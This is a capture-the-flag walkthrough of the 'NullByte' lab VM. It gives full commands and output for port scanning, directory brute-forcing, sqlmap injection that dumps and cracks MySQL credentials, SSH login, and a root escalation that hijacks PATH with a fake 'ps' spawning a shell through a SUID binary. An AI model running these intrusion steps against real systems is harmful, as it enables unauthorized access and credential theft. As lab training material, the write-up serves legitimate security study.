NULLBYTE

Scanning

Nmap

➜  ~ sudo nmap -A -p- -T4 nullbyte.vuln
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-13 11:51 EDT
Nmap scan report for nullbyte.vuln (172.16.129.141)
Host is up (0.0014s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34372/tcp6  status
|   100024  1          45260/tcp   status
|   100024  1          53470/udp6  status
|_  100024  1          58576/udp   status
777/tcp   open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
|   2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|   256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
|_  256 bc:f7:44:8d:79:6a:19:48:76:a3:e2:44:92:dc:13:a2 (ED25519)
45260/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:72:55:45 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.42 ms nullbyte.vuln (172.16.129.141)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.42 seconds

Enumeration

port 80

landing page

Whatweb

➜  ~ sudo whatweb nullbyte.vuln
http://nullbyte.vuln [200 OK] Apache[2.4.10], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[172.16.129.141], Title[Null Byte 00 - level 1]

Check directory

➜  ~  gobuster dir -u http://nullbyte.vuln -w /usr/share/wordlists/dirb/big.txt 

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://nullbyte.vuln
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/13 11:56:52 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 297]
/.htaccess            (Status: 403) [Size: 297]
/javascript           (Status: 301) [Size: 319] [--> http://nullbyte.vuln/javascript/]
/phpmyadmin           (Status: 301) [Size: 319] [--> http://nullbyte.vuln/phpmyadmin/]
/server-status        (Status: 403) [Size: 301]                                       
/uploads              (Status: 301) [Size: 316] [--> http://nullbyte.vuln/uploads/]   

===============================================================
2021/08/13 11:56:57 Finished
===============================================================

This challenge is CTF style ...

IMG Metadata

lets check metadata of landing page image

➜  ~ curl http://nullbyte.vuln/main.gif -o img | exiftool img  
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 16647  100 16647    0     0  2709k      0 --:--:-- --:--:-- --:--:-- 2709k
ExifTool Version Number         : 12.16
File Name                       : img
Directory                       : .
File Size                       : 16 KiB
File Modification Date/Time     : 2021:08:13 14:31:44-04:00
File Access Date/Time           : 2021:08:13 14:31:44-04:00
File Inode Change Date/Time     : 2021:08:13 14:31:44-04:00
File Permissions                : rw-r--r--
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 235
Image Height                    : 302
Has Color Map                   : No
Color Resolution Depth          : 8
Bits Per Pixel                  : 1
Background Color                : 0
Comment                         : P-): kzMb5nVYJw
Image Size                      : 235x302
Megapixels                      : 0.071

this line is interesting

Comment : P-): kzMb5nVYJw

intercept this page

brute forcing the only way

Exploiting

Brute forcing key

go for burp intruder

for payload i will use Seclists SecLists/Passwords/Common-Credentials/10k-most-common.txt

elite is the key

press <enter_key> only empty input

SQLmap

SQLmap against this input field

# identify DB
➜  ~ sqlmap -u 'http://nullbyte.vuln/kzMb5nVYJw/420search.php?usrtosearch=x' --dbs
. . .
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
. . .

# dump data
➜  ~ sqlmap -u 'http://nullbyte.vuln/kzMb5nVYJw/420search.php?usrtosearch=' --batch  --dump -C User,Password -T user -D mysqlBB
. . .
+------------------+-------------------------------------------------------+
| User             | Password                                              |
+------------------+-------------------------------------------------------+
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| debian-sys-maint | *BD9EDF51931EC5408154EBBB88AA01DA22B8A8DC             |
| phpmyadmin       | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
+------------------+-------------------------------------------------------+
. . .

Remember

we have /phpmyadmin directory gobuster output

Credentials : root:sunnyvale

phpMyAdmin

dive to Database: seth Table: users

Credentials : ramses pass is hashed lets crack it :)

YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE

decode base64

c6d6bd7ebf806f43c76acc3681703b81

crack the hash

omega i used hashes.com for hole process

Credentials : ramses:omega

SSH Connection

now lets connect to machine using SSH port 777

➜  ~ ssh ramses@nullbyte.vuln -p 777
The authenticity of host '[nullbyte.vuln]:777 ([172.16.129.141]:777)' can't be established.
ECDSA key fingerprint is SHA256:H/Y/TKggtnCfMGz457Jy6F6tUZPrvEDD62dP9A3ZIkU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[nullbyte.vuln]:777,[172.16.129.141]:777' (ECDSA) to the list of known hosts.
ramses@nullbyte.vuln's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug  2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$

Regular User Account Access

Privilege Escalation

SUID binary

ramses@NullByte:/var/www/backup$ find / -uid 0 -perm -4000 -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/procmail
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/sbin/exim4
/var/www/backup/procwatch
/bin/su
/bin/mount
/bin/umount
/sbin/mount.nfs

this file looks ... interesting :joy: /var/www/backup/procwatch lets take a look ...

ramses@NullByte:/var/www/backup$ ./procwatch
  PID TTY          TIME CMD
 1487 pts/0    00:00:00 procwatch
 1488 pts/0    00:00:00 sh
 1489 pts/0    00:00:00 ps

this file trigger ps command lets abuse it

ramses@NullByte:/var/www/backup$ export PATH=/var/www/backup:$PATH
ramses@NullByte:/var/www/backup$ touch ps
ramses@NullByte:/var/www/backup$  echo '/bin/sh -i' > ps
ramses@NullByte:/var/www/backup$ chmod 777 ps
ramses@NullByte:/var/www/backup$ ./procwatch
# whoami
root

Root User Account Access

PreviousTOPPO

Last updated 4 years ago